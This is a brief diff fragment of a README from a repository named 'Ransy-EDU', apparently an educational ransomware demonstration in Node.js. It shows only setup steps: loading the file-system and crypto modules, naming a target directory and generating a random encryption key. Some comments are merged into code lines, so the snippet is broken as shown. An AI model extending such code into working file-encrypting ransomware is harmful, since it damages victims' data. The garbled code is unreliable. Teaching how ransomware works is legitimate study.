VolkanSah/Ransy-EDU/README.md

 var fs = require('fs');
 var crypto = require('crypto');

-// The first step is to identify the directory to be targeted for file encryption.
 // Directory to target for file encryption var targetDirectory = '/user/files';

-// Generate encryption key
 // Once the encryption key is generated, the code will read all files in the target directory. var encryptionKey = crypto.randomBytes(32).toString('hex');